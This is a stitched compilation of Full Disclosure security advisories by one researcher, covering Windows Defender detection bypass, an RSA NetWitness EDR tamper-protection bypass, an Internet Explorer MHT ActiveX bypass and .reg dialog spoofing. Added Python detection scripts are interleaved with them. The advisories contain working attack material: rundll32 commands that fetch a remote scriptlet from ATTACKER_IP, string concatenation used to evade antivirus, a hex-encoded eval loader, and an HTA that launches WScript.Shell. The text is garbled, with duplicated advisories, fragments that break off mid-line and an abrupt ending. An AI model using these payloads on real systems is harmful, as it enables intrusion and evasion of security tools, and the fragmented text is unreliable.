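    # ';' ends the statement; the next token starts a new one if it is a command.
    for m in re.finditer(r';\s*([^\s&;]+)', name):
        if COMMAND_LIKE.match(m.group(1)):
            reasons.append("statement separator starts command %r" % m.group(1))
    if "&" in name and ";" in name and name.index("&") < name.index(";"):
        reasons.append("'&' before ';' (single-quote bypass shape; Event 403 "
                       "HostApplication is cut at the '&')")
    return reasons


def host_application_truncated(host_application):
    """An odd number of quotes means the logged command line ends mid-string,
    which is what the '&' shape produces in the Event 403 HostApplication field."""
    return (host_application.count("'") % 2 == 1
            or host_application.count('"') % 2 == 1)


def reconcile(host_application, process_cmdline):
    """Compare HostApplication with the full command line recorded by the
    process-creation event (assumed correlated by PID and time).
    Returns 'complete', 'truncated' or 'mismatch'."""
    def norm(s):
        return " ".join(s.split()).lower()
    logged, actual = norm(host_application), norm(process_cmdline)
    if logged == actual:
        return "complete"
    if actual.startswith(logged):
        return "truncated"
    return "mismatch"


if __name__ == "__main__":
    for name in SAMPLE_NAMES:
        for reason in classify_filename(name):
            print("%-32s %s" % (name, reason))
    print(reconcile(SAMPLE_HOST_APPLICATION, SAMPLE_PROCESS_CMDLINE))
```

The filename hunt is deliberately syntactic: PowerShell does not care whether "DOOM" exists until it runs, so a name that merely contains the shape is worth quarantining. For the log side, the useful alert is not "HostApplication is short" but "HostApplication is a strict prefix of the 4688/Sysmon command line and ends inside a quote", which is exactly what reconcile() plus host_application_truncated() report.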
[FD] Windows PowerShell / Trojan File RCE revisited
Hi,

Windows PowerShell Filename Code Execution POC
Discovery: 2019, revisited 2023

Since it still works, I dusted it off and made minor improvements:
Execute a remote DLL using rundll32
Execute an unintended secondary PS1 script or local text file (can be hidden)
Updated the PS1 Trojan Filename Creator Python3 script

First reported to Microsoft back in 2019, yet it remains unfixed as of the time of this writing. Remote code execution via a specially crafted filename.

https://github.com/hyp3rlinx/PSTrojanFile

Thank you,
hyp3rlinx
[FD] RSA NetWitness EDR Agent / Incorrect Access Control - Code Execution / CVE-2022-47529
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
RSA Security
www.netwitness.com

[Product]
NetWitness Endpoint EDR Agent

The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints, on and off the network, providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response.

[Vulnerability Type]
Incorrect Access Control / Code Execution

[CVE Reference]
CVE-2022-47529

[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending events to the SIEM, or to make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration: to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.

Interestingly, the agent was uploaded to VirusTotal on 2022-01-05 17:24:32 UTC, months before the finding and report.

SHA-256: 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe

[Severity]
Critical

[Impact(s)]
Denial-of-Service
Arbitrary Code Execution

[Attack Vector]
To exploit, open a handle to the memory objects held by the endpoint agent, modify the ACL of the ones that have insecure ACLs, and DENY access to the Everyone group.

[Affected Product Code Base]
All versions prior to v12.2

[Network Access]
Local

[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935

[Vuln Code Block]
0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:0001400F7B10 ; sub_14013BA50+19?p
.text:0001400F7B10 ; DATA XREF: ...
.text:0001400F7B10 push    rbx
.text:0001400F7B12 sub     rsp, 20h
.text:0001400F7B16 mov     rbx, rcx
.text:0001400F7B19 test    rcx, rcx
.text:0001400F7B1C jz      short loc_1400F7B5C
.text:0001400F7B1E call    cs:InitializeCriticalSection
.text:0001400F7B24 lea     rcx, [rbx+28h] ; lpCriticalSection
.text:0001400F7B28 call    cs:InitializeCriticalSection
.text:0001400F7B2E mov     edx, 1          ; bManualReset
.text:0001400F7B33 xor     r9d, r9d        ; lpName
.text:0001400F7B36 mov     r8d, edx        ; bInitialState
.text:0001400F7B39 xor     ecx, ecx        ; lpEventAttributes
.text:0001400F7B3B call    cs:CreateEventW
.text:0001400F7B41 mov     [rbx+50h], rax
.text:0001400F7B45 mov     dword ptr [rbx+58h], 0
.text:0001400F7B4C test    rax, rax
.text:0001400F7B4F jz      short loc_1400F7B5C

[Exploit/POC]
"RSA_NetWitness_Exploit.c"

#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"

#define OPEN_ALL_ACCESS 0x1F0003

/*
RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution

RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49

Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user.

By John Page (hyp3rlinx) - Nov 2022

DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse. Users of this supplied PoC code accept all risks, do no harm.

X64 PE file vuln code block:

0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:0001400F7B10 ; sub_14013BA50+19?p
.text:0001400F7B10 ; DATA XREF: ...
.text:0001400F7B10 push    rbx
.text:0001400F7B12 sub     rsp, 20h
.text:0001400F7B16 mov     rbx, rcx
.text:0001400F7B19 test    rcx, rcx
.text:0001400F7B1C jz      short loc_1400F7B5C
.text:0001400F7B1E call    cs:InitializeCriticalSection
.text:0
[FD] RSA NetWitness Platform EDR / Incorrect Access Control - Code Execution
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
RSA Security
www.netwitness.com

[Product]
NetWitness Endpoint EDR Agent

The RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints, on and off the network, providing deep visibility into their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidly detecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response.

[Vulnerability Type]
Incorrect Access Control / Code Execution

[CVE Reference]
CVE-2022-47529

[Security Issue]
CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending events to the SIEM or to make the agent run user-supplied commands. Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow local and admin Windows user accounts to modify the endpoint agent service configuration, either to disable it completely or to run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.

Interestingly, the agent was uploaded to VirusTotal on 2022-01-05 17:24:32 UTC, months before it was found and reported.

SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3d LANDeskService.exe

[Severity]
Critical

[Impact(s)]
Denial-of-Service
Arbitrary Code Execution

[Attack Vector]
To exploit, open a handle to the memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to the Everyone group.

[Affected Product Code Base]
All versions prior to v12.2

[Network Access]
Local

[References]
https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935

[Vuln Code Block]:
0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:0001400F7B10 ; sub_14013BA50+19?p
.text:0001400F7B10 ; DATA XREF: ...
.text:0001400F7B10 push rbx
.text:0001400F7B12 sub rsp, 20h
.text:0001400F7B16 mov rbx, rcx
.text:0001400F7B19 test rcx, rcx
.text:0001400F7B1C jz short loc_1400F7B5C
.text:0001400F7B1E call cs:InitializeCriticalSection
.text:0001400F7B24 lea rcx, [rbx+28h] ; lpCriticalSection
.text:0001400F7B28 call cs:InitializeCriticalSection
.text:0001400F7B2E mov edx, 1 ; bManualReset
.text:0001400F7B33 xor r9d, r9d ; lpName
.text:0001400F7B36 mov r8d, edx ; bInitialState
.text:0001400F7B39 xor ecx, ecx ; lpEventAttributes
.text:0001400F7B3B call cs:CreateEventW
.text:0001400F7B41 mov [rbx+50h], rax
.text:0001400F7B45 mov dword ptr [rbx+58h], 0
.text:0001400F7B4C test rax, rax
.text:0001400F7B4F jz short loc_1400F7B5C

[Exploit/POC]
"RSA_NetWitness_Exploit.c"

#include "windows.h"
#include "stdio.h"
#include "accctrl.h"
#include "aclapi.h"

#define OPEN_ALL_ACCESS 0x1F0003

/*
RSA NetWitness EDR Endpoint Agent Tamper Protection Bypass / EoP Code Execution
RSA NetWitness.msi --> NWEAgent.exe
MD5: c0aa7e52cbf7799161bac9ebefa38d49

Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.
Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user.

By John Page (hyp3rlinx) - Nov 2022

DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse.
Users of this supplied PoC code accept all risks, do no harm.

X64 PE file vuln code block:
0001400F7B10 sub_1400F7B10 proc near ; CODE XREF: sub_14012F6F0+19B?p
.text:0001400F7B10 ; sub_14013BA50+19?p
.text:0001400F7B10 ; DATA XREF: ...
.text:0001400F7B10 push rbx
.text:0001400F7B12 sub rsp, 20h
.text:0001400F7B16 mov rbx, rcx
.text:0001400F7B19 test rcx, rcx
.text:0001400F7B1C jz short loc_1400F7B5C
.text:0001400F7B1E call
[FD] Microsoft Windows Contact File / Remote Code Execution (Resurrected) CVE-2022-44666
[-] Microsoft Windows Contact file / Remote Code Execution (Resurrected 2022) / CVE-2022-44666
[+] John Page (aka hyp3rlinx)
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

Back in 2018 I discovered three related Windows remote code execution vulnerabilities affecting both VCF and Contact files. They were purchased by Trend Micro Zero Day Initiative (@thezdi) from me and received candidate identifiers ZDI-CAN-6920 and ZDI-CAN-7591. Microsoft as usual denied a fix and it was subsequently dropped as a zero day on January 10, 2019 in coordination with the ZDI program.

Almost five years passed, until researcher j00sean resurrected the flaws to add additional protocol vectors, LDAP etc. Microsoft finally decided to patch and assign CVE-2022-44666 even though the vulnerabilities are exactly the same.

Old 2019 advisories:
====================
1) Windows VCF RCE
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt

2) Windows Contact HTML injection
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt

3) Windows Contact RCE
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt

Circa 2022 updated:
===================
https://github.com/j00sean/CVE-2022-44666#readme
https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-44666

Additional References:
======================
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
https://www.zdnet.com/article/poc-for-windows-vcf-zero-day-published-online/
https://thehackernews.com/2019/01/vcard-windows-hacking.html
https://twitter.com/hyp3rlinx/status/1083528552253919232
https://seclists.org/bugtraq/2019/Jan/43
https://vimeo.com/312824315
https://www.exploit-db.com/exploits/46167
https://www.rapid7.com/db/modules/exploit/windows/fileformat/microsoft_windows_contact/

Special thanks to j00sean for his work and resurrecting this vulnerability from the dead and helping deal with M$

hyp3rlinx

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
[FD] Microsoft Windows Defender / Detection Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Windows Defender

Microsoft Defender Antivirus is a major component of your next-generation protection in Microsoft Defender for Endpoint. This protection brings together machine learning, big-data analysis, in-depth threat resistance research, and the Microsoft cloud infrastructure to protect devices (or endpoints) in your organization. Microsoft Defender Antivirus is built into Windows, and it works with Microsoft Defender for Endpoint to provide protection on your device and in the cloud.

[Vulnerability Type]
Windows Defender Detection Bypass
TrojanWin32Powessere.G - Backdoor:JS/Relvelshe.A

[CVE Reference]
N/A

[Security Issue]
Currently, Windows Defender detects and prevents TrojanWin32Powessere.G aka "POWERLIKS" type execution that leverages rundll32.exe. Attempts at execution fail and attackers will get an "Access is denied" error message. However, it can be easily bypassed by passing an extra path traversal when referencing mshtml.

C:\>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)
Access is denied.

Pass an extra "..\" to the path.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";alert(666)

Windows Defender also detects based on the following javascript call using GetObject("script:http://ATTACKER_IP/hi.tmp"). However, that interference can be bypassed by using concatenation when constructing the URL scheme portion of the payload.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://ATTACKER_IP/hi.tmp")
Access is denied.

Full bypass E.g.

C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")

Enter, Backdoor:JS/Relvelshe.A detection.

Windows Defender also prevents downloaded code execution, detected as "Backdoor:JS/Relvelshe.A", and the file is removed by Windows Defender once it hits INetCache.

"C:\Users\victim\AppData\Local\Microsoft\Windows\INetCache\IE\2MH5KJXI\hi.tmp[1]"

However, this is easily bypassed by hex encoding our payload code new ActiveXObject("WScript.Shell").Run("calc.exe"). Then, call String.fromCharCode(parseInt(hex.substr(n, 2), 16)) to decode it on the fly, passing the value to JScript's built-in eval function.

[References]
Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427

Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426

Advisory: https://twitter.com/hyp3rlinx/status/1480651583172091904

[Exploit/PoC]
1) Remote code JScript component "hi.tmp", hosted on a server on port 80; it pops calc.exe using WScript.Shell and defeats Backdoor:JS/Relvelshe.A detection.

python -m http.server 80

"hi.tmp"

<![CDATA[
var hex = "6E657720416374697665584F626A6563742822575363726970742E5368656C6C22292E52756E282263616C632E6578652229";
var str = '';
for (var n = 0; n < hex.length; n += 2) {
    str += String.fromCharCode(parseInt(hex.substr(n, 2), 16));
}
eval(str)
]]>

2) C:\>rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")

BOOM!

[Network Access]
Local

[Severity]
High

[Disclosure Timeline]
January 10, 2022 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
[FD] Microsoft Windows .Reg File Dialog Spoof / Mitigation Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_REG_FILE_DIALOG_SPOOF_MITIGATION_BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

A file with the .reg file extension is a Registration file used by the Windows registry. These files can contain hives, keys, and values. .reg files can be created from scratch in a text editor or can be produced by the Windows registry when backing up parts of the registry.

[Vulnerability Type]
Windows .Reg File Dialog Spoof - Mitigation Bypass

[CVE Reference]
N/A

[Security Issue]
Back in 2019 I disclosed a novel way to spoof the Windows registry dialog warning box to display an attacker-controlled message. This spoofing flaw lets us spoof the "Are you sure you want to continue?" warning message to instead read "Click Yes to abort" or whatever else an attacker would like to display. This flaw can potentially make users think they are canceling the registry import when they are in fact importing it, as we can make the registry security warning dialog box LIE to them, since the warning messages are now under an attacker's control. The way it works is by using a specially crafted .Reg filename; this allows control of the registry warning dialog message presented to an end user.

Recently, I noticed in 2022 that the .Reg file dialog spoof no longer works on Windows 10, but instead triggers an access violation in Regedit.exe. Therefore, something has changed in the OS, possibly a silent mitigation, hmmm. Wouldn't be the first time: back in 2016 my msinfo32.exe .NFO file XXE injection vulnerability report had a similar fate, fixed with no CVE or bulletin, and that one allowed remote file access data theft.

In a threatpost.com interview in 2019, Microsoft stated "The issue submitted does not meet the severity bar for servicing via a security update".

Reference: https://threatpost.com/windows-bug-spoof-dialog-boxes/142711

However, the "fix" is easily bypassed and the old payload can still be made to work across systems. Bypassing the .Reg spoofing fix was only the start; I had to find ways to bypass two different Windows Defender detections along the way for the PoC.

Trojan:Win32/Powessere.G
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Trojan%3AWin32%2FPowessere.G%21lnk&ThreatID=2147752427

Backdoor:JS/Relvelshe.A
https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:JS/Relvelshe.A&ThreatID=2147744426

Let's begin...

My original .Reg file spoofing payload of 2019 now triggers an access violation and crashes regedit.exe from an invalid pointer read.

7FFE7A4A7C83 | EB 0D          | jmp ntdll.7FFE7A4A7C92      |
7FFE7A4A7C85 | FF C9          | dec ecx                     | ;This loops thru to read in the path + filename
7FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w  | ;ACCESS VIOLATION HERE
7FFE7A4A7C8C | 74 08          | je ntdll.7FFE7A4A7C96       | ;Move the string down two bytes
7FFE7A4A7C8E | 49 83 C5 02    | add r13,2                   | r13:L"10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
7FFE7A4A7C92 | 85 C9          | test ecx,ecx                |

7FFE7A4A7C87 | 66 45 39 5D 00 | cmp word ptr ds:[r13],r11w  | ; BOOM ACCESS VIOLATION on Win10, but not Win7

ntdll!woutput_l+0x387:
7ffe`7a4a7c87 6645395d00 cmp word ptr [r13],r11w ds:01ed`=

Online search shows Win-7 still makes up about 22% of the world's computers, so I asked my friend, security researcher Eduardo Braun Prado (Edu_Braun_0day), to help me re-test the .REG file spoof on Windows 7 for completeness. Turns out my original payload still works on Win-7 and, with minor tweaks, on Win-10.

Original works on Win-7, but crashes regedit.exe on Win-10:
Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg

Original payload (first mitigation bypass) works Win-7/Win-10:
Remove the second-to-last byte (%1) before the %0 string terminator and the %b characters.
Windows_Reg_Spoof_Mitigation_Bypass.r%e%g%r%nC%l%i%c%k%b%Y%e%s%0.reg

New payload mitigation bypass works on both Win-7 and Win-10:
Windows_Reg_Spoof_Mitigation_Bypass.%n%nClick YES to cancel%0.reg

However, we are NOT done yet as we must deal with Windows Defender detection preventions.

1) Trojan:Win32/Powessere.G
2) Backdoor:JS/Relvelshe.A

Bypassing "Trojan:Win32/Powessere.G"
====================================
Two components are required to defeat Trojan:Win32/Powessere.G detection in Windows Defender.

A) extra path traversal when referencing mshtml ..\\..\\..\\
B) concat
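The rundll32 variants in this post and in the "Detection Bypass" advisory above (the extra "..\" before mshtml, the concatenated GetObject URL, the hex-encoded JScript in hi.tmp) all leave the same signal in process-creation telemetry. The script below is an added example, not the author's code: it folds string concatenation before matching, matches the mshtml export at any traversal depth, and decodes the hex blob for the analyst; the command lines are constructed samples (ATTACKER_IP is the advisory's placeholder).

```python
import re

# Constructed detection logic; not from the advisories. Each regex targets one of the
# three signals the posts above describe.
RUNDLL32_JS_RE = re.compile(r"\brundll32(?:\.exe)?\b.*?\bjavascript:", re.IGNORECASE)
# The DLL reference is matched after the traversal segments, so "\..\..\" and
# "\..\..\..\" (the extra hop that slips past the detection) both hit.
MSHTML_RUNHTA_RE = re.compile(r"mshtml\s*,\s*RunHTMLApplication", re.IGNORECASE)
GETOBJECT_SCRIPT_RE = re.compile(r"GetObject\(\s*\"script:", re.IGNORECASE)
# Long even-length hex runs: the loader's hex.substr(n, 2) / fromCharCode scheme.
HEX_BLOB_RE = re.compile(r"[0-9A-Fa-f]{40,}")
SUSPICIOUS_DECODED = ("ActiveXObject", "WScript.Shell")


def fold_string_concat(text):
    """Collapse JScript literal concatenation so "a"+"b" reads as "ab" before matching."""
    return re.sub(r"\"\s*\+\s*\"", "", text)


def analyze_command_line(cmdline):
    """Return the list of reasons a process command line is suspicious (empty = clean)."""
    folded = fold_string_concat(cmdline)
    reasons = []
    if RUNDLL32_JS_RE.search(folded):
        reasons.append("rundll32 invoked with the javascript: protocol handler")
    if MSHTML_RUNHTA_RE.search(folded):
        reasons.append("mshtml,RunHTMLApplication export (any traversal depth)")
    if GETOBJECT_SCRIPT_RE.search(folded):
        reasons.append('GetObject("script:...") remote scriptlet fetch (concatenation folded)')
    return reasons


def scan_log(cmdlines):
    """Run analyze_command_line over a batch and keep the lines that tripped a check."""
    hits = []
    for line in cmdlines:
        reasons = analyze_command_line(line)
        if reasons:
            hits.append((line, reasons))
    return hits


def decode_hex_blobs(script_text):
    """Decode every long hex run in a fetched script so the analyst sees the real payload."""
    decoded = []
    for blob in HEX_BLOB_RE.findall(script_text):
        if len(blob) % 2:
            continue
        text = bytes.fromhex(blob).decode("latin-1")
        if text.isprintable():
            decoded.append(text)
    return decoded


def triage_script(script_text):
    """Return only the decoded strings that reference WScript.Shell / ActiveXObject."""
    return [t for t in decode_hex_blobs(script_text)
            if any(marker in t for marker in SUSPICIOUS_DECODED)]


# Constructed sample process-creation command lines (not real telemetry); the first two
# are the shapes shown in the advisories, the last two are benign rundll32/notepad use.
SAMPLE_CMDLINES = [
    r'rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(1)',
    r'rundll32.exe javascript:"\..\..\..\mshtml,RunHTMLApplication ";document.write();'
    r'GetObject("script"+":"+"http://ATTACKER_IP/hi.tmp")',
    r'rundll32.exe shell32.dll,Control_RunDLL hotplug.dll',
    r'notepad.exe C:\Users\victim\notes.txt',
]

# The hex string from the advisory's hi.tmp, embedded here as sample input.
SAMPLE_HEX = ("6E657720416374697665584F626A6563742822575363726970742E5368656C6C"
              "22292E52756E282263616C632E6578652229")
SAMPLE_SCRIPT = 'var hex = "' + SAMPLE_HEX + '";'

if __name__ == "__main__":
    for line, reasons in scan_log(SAMPLE_CMDLINES):
        print(line)
        for reason in reasons:
            print("  ->", reason)
    for text in triage_script(SAMPLE_SCRIPT):
        print("decoded payload:", text)
```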
[FD] Microsoft Internet Explorer / ActiveX Control Security Bypass
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-INTERNET-EXPLORER-ACTIVEX-CONTROL-SECURITY-BYPASS.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
Microsoft Internet Explorer (MSIE)

Internet Explorer is a discontinued series of graphical web browsers developed by Microsoft and included in the Microsoft Windows line of operating systems, starting in 1995.

[Vulnerability Type]
ActiveX Control Security Bypass

[CVE Reference]
N/A

[Security Issue]
Upon opening a specially crafted .MHT file on disk, Internet Explorer ActiveX control warnings as well as popup blocker privacy settings are not enforced. This can allow the execution of ActiveX content with zero warning to an unsuspecting end user and/or force them to visit arbitrary attacker-controlled websites.

By default, when opening browser-associated files that contain active content, MSIE restricts scripts from running without explicit user interaction and permission. Instead, end users are presented with a yellow warning bar on the browser's webpage, asking first if they wish to allow the running of blocked content. This prevents execution of active content scripts or controls without the user first clicking the "Allow blocked content" warning bar.

However, specially crafted MHT files residing on disk that contain an invalid header directive suppress ActiveX warnings and popup blocker privacy settings. Therefore, to bypass Internet Explorer "active content" blocking, the file needs to contain a Content-Location header using an arbitrary named value, e.g. "Content-Location: PBARBAR".

Note, oftentimes MHT files are set to open in IE by default, and IE, while discontinued, is still present on the Windows OS.

Tested successfully on Windows 10 latest fully patched version with default IE security settings.

Expected result: ActiveX control security warning, prevention of code execution and blocking of browser popup windows.

Actual result: No ActiveX control code execution blocking, security warnings or browser window popup blocking enforcement.

[PoC Requirements]
MHT file must reside on disk, think targeted attack scenarios.

[Exploit/POC]
Change the [VICTIM] value below to a specified user for testing.

1) Create the MHT PoC file.

"MSIE_ActiveX_Control_Security_Bypass.mht"

From:
Subject:
Date:
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001"

This is a multi-part message in MIME format.

--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/transitional.dtd">
<script>
win=window
win.open("http://www.microsoft.com","","width=600,height=600")
var args = ['height='+1,'width='+1,].join(',')
setTimeout("", 3000)
var pop = win.open('c:/Users/[VICTIM]/Desktop/Sales_Report_2021.csv .hta', 'pop', args)
pop.moveTo(2000,2000)
</script>

--=_NextPart_SMP_1d4d45cf4e8b3ee_3ddb1153_0001--

2) Create the PoC HTA file.

"Sales_Report_2021.csv .hta"

<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run("calc.exe")
</script>

3) Open the MHT file locally.

[Network Access]
Local

[POC/Video URL]
https://www.youtube.com/watch?v=UCSqFbYUvBk

[Disclosure Timeline]
Vendor Notification: May 13, 2019
MSRC : July 2, 2019 "We determined that a fix for this issue will be considered in a future version of this product or service. At this time, we will not be providing ongoing updates of the status of the fix for this issue, and we have closed this case."
December 5, 2021 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
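As an added example (not the advisory author's code), a Python triage routine for MHT files found on disk: it parses the MIME parts with the standard library and flags the three markers described above, a Content-Location that is not a URL, a script that opens a local .hta, and a filename whose real extension hides behind a run of spaces. Both MHT documents below are constructed samples; [VICTIM] is the advisory's placeholder.

```python
import email
import re
from urllib.parse import urlparse

# Constructed triage logic; not the advisory author's code.
# First argument of any window.open()/win.open() call in the part's script.
OPEN_CALL_RE = re.compile(r"""\.open\(\s*(['"])(.*?)\1""", re.IGNORECASE)
# Windows drive path or file: URL, i.e. something on the victim's own disk.
LOCAL_PATH_RE = re.compile(r"^(?:[a-z]:[/\\]|file:)", re.IGNORECASE)
# Two or more spaces immediately before the final extension.
HIDDEN_EXT_RE = re.compile(r"\s{2,}\.[a-z0-9]+$", re.IGNORECASE)


def content_location_is_url(value):
    """Archives saved by a browser carry an http(s)/file Content-Location.
    A bare token such as "PBARBAR" or "DOOM" is the invalid directive described above."""
    if value is None:
        return True  # header absent: not the trick this check is for
    parsed = urlparse(value.strip())
    return parsed.scheme in ("http", "https", "file") and bool(parsed.netloc or parsed.path)


def open_targets(html):
    """Targets of open() calls found in the HTML/script text, in order."""
    return [m.group(2) for m in OPEN_CALL_RE.finditer(html)]


def target_findings(target):
    """Reasons one open() target is suspicious (empty list = nothing odd)."""
    reasons = []
    if LOCAL_PATH_RE.match(target):
        reasons.append("script opens a local path: %r" % target)
        if target.rstrip().lower().endswith(".hta"):
            reasons.append("local target is an HTA, which runs script outside the browser sandbox")
    if HIDDEN_EXT_RE.search(target):
        reasons.append("real extension is hidden behind a run of spaces")
    return reasons


def triage_mht(raw):
    """Parse one MHT document and return human-readable findings for its HTML parts."""
    msg = email.message_from_string(raw)
    findings = []
    for index, part in enumerate(msg.walk()):
        if part.get_content_type() != "text/html":
            continue
        location = part.get("Content-Location")
        if not content_location_is_url(location):
            findings.append("part %d: Content-Location %r is not a URL" % (index, location))
        charset = part.get_content_charset() or "utf-8"
        html = part.get_payload(decode=True).decode(charset, errors="replace")
        for target in open_targets(html):
            findings.extend("part %d: %s" % (index, r) for r in target_findings(target))
    return findings


# Constructed sample mirroring the PoC layout above (not the advisory's file).
SAMPLE_MHT = """\
From:
Subject:
Date:
MIME-Version: 1.0
Content-Type: multipart/related; type="text/html"; boundary="=_NextPart_000"

This is a multi-part message in MIME format.

--=_NextPart_000
Content-Type: text/html; charset="UTF-8"
Content-Location: DOOM

<script>
win=window
win.open("http://www.microsoft.com","","width=600,height=600")
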